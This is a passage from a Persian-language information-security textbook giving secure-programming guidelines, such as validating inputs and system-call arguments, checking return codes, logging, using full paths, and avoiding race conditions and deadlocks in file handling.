ﺑﻌﺪ ﺍﺯ ﻧﻮﺷﺘﻦ ﻫﺮ ﻗﺴﻤﺖ ﻛﻮﭼﻚ ﺍﺯ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺁﺯﻣﺎﻳﺶ ﺁﻥ ﺑﭙﺮﺩﺍﺯﻳﺪ .ﻭﻗﺘﻲ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻳـﺪ ﻣﺘﻨﺎﻭﺑـﹰﺎ ﺁﻧـﺮﺍ .٥
ﺁﺯﻣﺎﻳﺶ ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ ﻗﺴﻤﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻫـﻢ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﻭﺭﻭﺩﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻭ ﻫـﻢ ﺍﺯ
ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﻮﺍﺑﻊ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﭘـﺬﻳﺮﻓﺘﻦ ﺁﺭﮔﻮﻣﺎﻧﻬـﺎﻱ
ﻭﺭﻭﺩﻱ ،ﺻﺤﺖ ﻭ ﺍﻋﺘﺒﺎﺭ ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ ،ﻭﺍﻛﻨﺸﻬﺎﻱ ﻣﻨﻄﻘﻲ )ﻣﺜﻞ ﺧـﺮﻭﺝ ﺍﺯ ﺑﺮﻧﺎﻣـﻪ ﻭ ﻧﻤـﺎﻳﺶ
ﻳﻚ ﭘﻴﺎﻡ ﻳﺎ ﻛﺪ ﻣﺒﻨﻲ ﺑﺮ ﻧﺎﺻﺤﻴﺢ ﺑﻮﺩﻥ ﺁﺭﮔﻮﻣﺎﻥ( ﺍﺯ ﺧﻮﺩ ﻧﺸﺎﻥ ﺩﻫﻨﺪ .ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺍﺷﻜﺎﻻﺕ ﺳـﺎﺩﺓ ﺑﺮﻧﺎﻣـﻪﺍﻱ
ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻛﺮﺩ .ﺑﺎ ﻧﻮﺷﺘﻦ ﺩﻗﻴﻘﺘﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺑﻴـﺸﺘﺮﻱ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺗﻤﺎﻣﻲ ﻣﻘﺎﺩﻳﺮ ﻭﺭﻭﺩﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺗﻌﺪﺍﺩ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ ﺁﻧﺠـﺎ ﻧﺎﺷـﻲ .٦
ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﻣﻘﺪﺍﺭ ﻭﺭﻭﺩﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻭ ﻳﺎ ﻳﻚ ﻗﺎﻟﺐ ﺩﺍﺩﻩﺍﻱ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﺭﺍ ﺑﻪ ﻳﻚ ﺗﺎﺑﻊ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﻨـﺪ.
ﻳﻚ ﺭﺍﻩ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺑﺮﻭﺯ ﭼﻨﻴﻦ ﻣﺸﻜﻼﺗﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻫﻤﻮﺍﺭﻩ ﺁﺭﮔﻮﻣﺎﻧﻬـﺎﻱ ﻭﺭﻭﺩﻱ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ
ﺻﺤﺖ ﻭ ﺍﻋﺘﺒﺎﺭ ،ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ .ﻛﻨﺘﺮﻝ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺳﺮﻋﺖ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﺩ
ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﺨﺎﺻﻢ ﻛﻤﺘﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﺓ ﺳﻮﺀ ﻧﻤﺎﻳﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﻛﻨﺘﺮﻝ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﻭ ﮔﺰﺍﺭﺵ ﺧﺮﺍﺑﻴﻬﺎ ﺳﺒﺐ ﺁﻥ ﺍﺳﺖ ﻛـﻪ
ﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﮔﺮﺩﺩ.
ﻓﺮﺁﻳﻨﺪ ﺍﺻﻼﺡ ﺍﺷﻜﻼﺕ ﻏﻴﺮﺍﻣﻨﻴﺘ ﹺ
ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻲﻓﺮﺳﺘﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ .ﺣﺘـﻲ ﺍﮔـﺮ ﺑﺮﻧﺎﻣـﻪ ﻳـﻚ ﺗـﺎﺑﻊ ﺳﻴـﺴﺘﻤﻲ ﺭﺍ ﻓﺮﺍﺧـﻮﺍﻧﻲ .٧
ﻣﻲﻛﻨﺪ ،ﺑﺎﺯ ﻫﻢ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﻤﺎﻧﻬﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺁﻥ ﺗﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ
ﻼ ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺩﺭ ﺷﺎﺧﺔ ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗـﺎﺑﻊ )( indexﺩﺭ ﺯﺑـﺎﻥ Cﻳـﺎ ﺩﺍﺭﺩ .ﻣﺜ ﹰ
perlﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻧﺎﻡ ﻓﺎﻳﻞ ﻋﻼﻣﺖ ﻣﻤﻴﺰ ) (/ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ ،ﻭ ﺍﮔﺮ ﻧﺎﻡ ﻓﺎﻳﻞ ﺩﺍﺭﺍﻱ ﻋﻼﻣـﺖ ﻣﻤﻴـﺰ ﺍﺳـﺖ ﻭ
ﻧﺒﺎﻳﺪ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺷﺪ ،ﺑﺮﻧﺎﻣﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ.
ﻫﻤﺔ ﺧﺮﻭﺟﻴﻬﺎﻱ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ .ﺑﺮﻧﺎﻣﺔ ) POSIXﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑـﻪ ﺯﺑﺎﻧﻬـﺎﻱ Cﻭ PERLﻣـﻮﺭﺩ .۸
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ( ﻫﺮ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻛﺪ ﺧﺮﻭﺟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺣﺘﻲ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻛـﻪ ﺷـﻤﺎ
ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﻧﻤﻲﺩﻫﻴﺪ -ﻣﺜـﻞ )( ،chdir() ،writeﻭ ﻳـﺎ )( - chownﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺤـﺖ ﺷـﺮﺍﻳﻂ ﺍﺳـﺘﺜﻨﺎﻳﻲ
ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻧﻜﻨﻨﺪ ﻭ ﺧﺮﻭﺟﻴﻬﺎﻱ ﻏﻴﺮﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺗﻮﻟﻴﺪ ﻛﻨﻨـﺪ .ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﻧﺘﻮﺍﻧـﺴﺖ ﺩﺭﺳـﺖ ﻋﻤـﻞ ﻛﻨـﺪ ،ﻣﺘﻐﻴـﺮ
٣٦٣ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺷﻤﺎﺭﺓ ﺧﻄﺎ ٢٢٠ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺩﻟﻴﻞ ﻭﻗﻮﻉ ﺍﺷﻜﺎﻝ ﺭﺍ ﺑﻔﻬﻤﻴﺪ .ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻣﻘﺎﺩﻳﺮ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻧﺘﻈـﺎﺭ ﺭﺍ
ﺛﺒﺖ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﺮ ﺩﻟﻴﻞ ﻏﻴﺮﻣﻨﺘﻈﺮﻩﺍﻱ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﺪ ،ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﭘﺮﺩﺍﺯﺓ ﺁﻥ ﭘﺎﻳﺎﻥ
ﻲ ﺁﻳﻨﺪﻩ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ. ﺩﻫﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺍﻗﺪﺍﻣﺎﺕ ﺑﻪ ﻛﻢ ﺷﺪﻥ ﺍﺷﻜﺎﻻﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻭ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘ ﹺ
ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﺧﻠﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﻳﻚ ﻣﺘﻐﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﺪ ﻣﻘﺎﺩﻳﺮ ،۲ ،۱ .٩
ﻭ ﻳﺎ ۳ﺭﺍ ﺑﮕﻴﺮﺩ ،ﺁﻥ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻘﺎﺩﻳﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ،ﻭ ﺑﺮﺍﻱ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﻘﺎﺩﻳﺮﻱ ﻏﻴﺮ ﺍﺯ ﺍﻳﻨﻬﺎ ﺩﺍﺭﺩ ﭘﻴﺶﺑﻴﻨﻲﻫـﺎﻱ ﻻﺯﻡ ﺭﺍ
ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ) .ﺍﮔﺮ ﺑﺎ ﺯﺑﺎﻥ Cﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻣﻲﻛﻨﻴﺪ ،ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺎﻛﺮﻭﻱ assertﺑﺴﺎﺩﮔﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ(.
ﻻ ﺛﺒﺘﻬﺎﻱ ﻣﻔﺼﻞ ،ﺍﻃﻼﻋﺎﺕ ﺟﺰﺋﻲ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺛﺒﺘﻬـﺎﻱ ﺧﻼﺻـﻪ ﺩﺭ .١٠ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻭ ﻃﺮﺯ ﺭﻓﺘﺎﺭ ﺁﻥ ﺛﺒﺘﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ .ﻣﻌﻤﻮ ﹰ
ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ .ﺑﺠﺎﻱ ﺛﺒﺖ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻞ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﻓﺎﻳﻞ ﺛﺒﺖ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ،ﺍﻃﻼﻋـﺎﺕ ﺛﺒـﺖ
ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ ﺍﺧﺘﺼﺎﺻﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻳﺎﻓﺘﻦ ﻣﺸﻜﻼﺕ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ .ﻫﻤﭽﻨـﻴﻦ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ) syslogﺩﺭ (UNIXﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺎ ﺁﻥ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﺴﻮﻱ ﻓﺎﻳﻠﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺪﺍﻳﺖ ﻛﻨﻴـﺪ،
ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻔﺮﺳﺘﻴﺪ ،ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ.
.١١ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻗﺴﻤﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺳﺎﺩﻩ ﻭ ﻛﻮﭼﻚ ﺳﺎﺯﻳﺪ.
ﻞ ﻧﺎﻡ ﺑﺮﺍﻱ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ،ﻫﻢ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ .ﺑﺠـﺎﻱ .١٢ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﻣﺴﻴﺮﻫﺎﻱ ﻛﺎﻣ ﹺ
ﻭﺍﺑﺴﺘﻪﻛﺮﺩﻥ ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺷﺎﺧﺔ ﺟﺎﺭﻱ ،ﺻﺮﺍﺣﺘﹰﺎ ﻣﺴﻴﺮ ﺻﺤﻴﺢ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﺎﻳﻴﺪ.
.١٣ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻭﺯ ﺷﺮﺍﻳﻂ ﺭﻗﺎﺑﺖ ٢٢١ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﻫﻮﺷﻴﺎﺭ ﺑﺎﺷﻴﺪ .ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﺑﻦﺑﺴﺖ ٢٢٢ﻭ ﻳـﺎ ﻳـﻚ ﻧـﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺍﺟـﺮﺍﻱ
ﺻﺤﻴﺢ ﺩﻭ ﻓﺮﺍﺧﻮﺍﻧﻲ ﻧﺰﺩﻳﻚ ﺑﻪ ﻫﻢ ﺭﺥ ﺩﻫﺪ:
ﺷﺮﺍﻳﻂ ﺑﻦﺑﺴﺖ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻭﺍﺣﺪ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺑﻬﺘـﺮ ﺍﺳـﺖ
ﻫﺮ ﻓﺎﻳﻠﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﺭﺍ ﻗﻔﻞ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﺣﺎﻟﺘﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺍﺯ ﺣﺎﻓﻈـﻪ ﺑﻴـﺮﻭﻥ
ﺍﻧﺪﺍﺧﺘﻪ ﻣﻲﺷﻮﺩ ،ﭼﺎﺭﻩﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﺷﺪﻥ ﻗﻔﻞ ﻓﺎﻳﻞ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ .ﺍﺯ ﺑﺮﻭﺯ ﺑﻦﺑﺴﺖ ﻭ ﻳﺎ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺑﻦﺑﺴﺖ ﻣﻨﺠـﺮ ﺷـﻮﺩ
ﻼ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺍﺑﺘﺪﺍ ﻓﺎﻳﻞ Aﺭﺍ ﺑﺮﺍﻱ ﺧﻮﺩ ﻗﻔﻞ ﻣﻲﻛﻨﺪ ﻭ ﺳﭙﺲ ﻣـﻲﺧﻮﺍﻫـﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺯﻣﺎﻧﻲ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﻣﺜ ﹰ
ﻼ ﻓﺎﻳﻞ Bﺭﺍ ﻗﻔﻞ ﻛﺮﺩﻩ ،ﻣﻲﺧﻮﺍﻫﺪ ﻓﺎﻳﻞ Aﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﺧﻮﺩ ﻗﻔﻞ ﻛﻨﺪ.
ﻓﺎﻳﻞ Bﺭﺍ ﻗﻔﻞ ﻛﻨﺪ ،ﻭ ﻫﻤﺰﻣﺎﻥ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﻗﺒ ﹰ
ﺷﺮﺍﻳﻂ ﺭﻗﺎﺑﺖ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﺼﻮﺭﺕ ﺑﺪﻭﻥ ﻭﻗﻔﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﺗﺎ ﺍﻧﺘﻬﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻴـﺎﻥ ﺍﺟـﺮﺍﻱ ﻫـﺮ ﺩﻭ
ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺑﺮﻧﺎﻣﻪ ﻭﻗﻔﺔ ﻛﻮﺗﺎﻫﻲ ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ -ﺣﺘﻲ ﺷﺎﻳﺪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ ﺩﺭ ﻛـﺎﺭ ﺑﺮﻧﺎﻣـﺔ
ﺷﻤﺎ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﻛﻨﺪ -ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻗﺖ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﺩﺭ ﺁﻥ ﻫـﻴﭻ ﺩﻭ
ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﺘﻮﺍﻟﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺩﺳﺘﻮﺭﺍﺕ ﺩﻟﺨﻮﺍﻩ ﻣﻴﺎﻥ ﺁﻧﺎﻥ ﺩﭼﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﻧﺪ .ﺑﻄﻮﺭ ﺧﺎﺹ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭼﻨﺪ
ﻋﻤﻠﻴﺎﺕ ﺭﻭﻱ ﻳﻚ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻣﺎﻟﻚ ﺁﻧﺮﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻴﺪ ،ﻓﺎﻳﻞ ﺭﺍ ﻣﺎﻧﺪﮔﺎﺭ ﻣﻲﻛﻨﻴﺪ ،ﺣﺎﻟﺖ ﻓﺎﻳﻞ ﺭﺍ ﻋﻮﺽ ﻣﻲﻛﻨﻴﺪ ،ﻭ ،(...ﺍﺑﺘﺪﺍ ﻓﺎﻳﻞ
ﺭﺍ ﺑﺎﺯ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺍﺯ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ )( ،fstat() ،fchownﻭ )( fchmodﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﺩ
ﻣﺎﺩﺍﻣﻴﻜﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺷﻤﺎ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ،ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮﻱ ﻧﺘﻮﺍﻧﺪ ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ ،ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﺑﺮﻭﺯ ﻳـﻚ ﺣﺎﻟـﺖ
ﻣﺤﺘﻤﻞ ﺭﻗﺎﺑﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻛﺴﺐ ﺁﮔﺎﻫﻲ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﻓﺎﻳﻞ ،ﺍﺯ ﺗـﺎﺑﻊ )( accessﺍﺳـﺘﻔﺎﺩﻩ
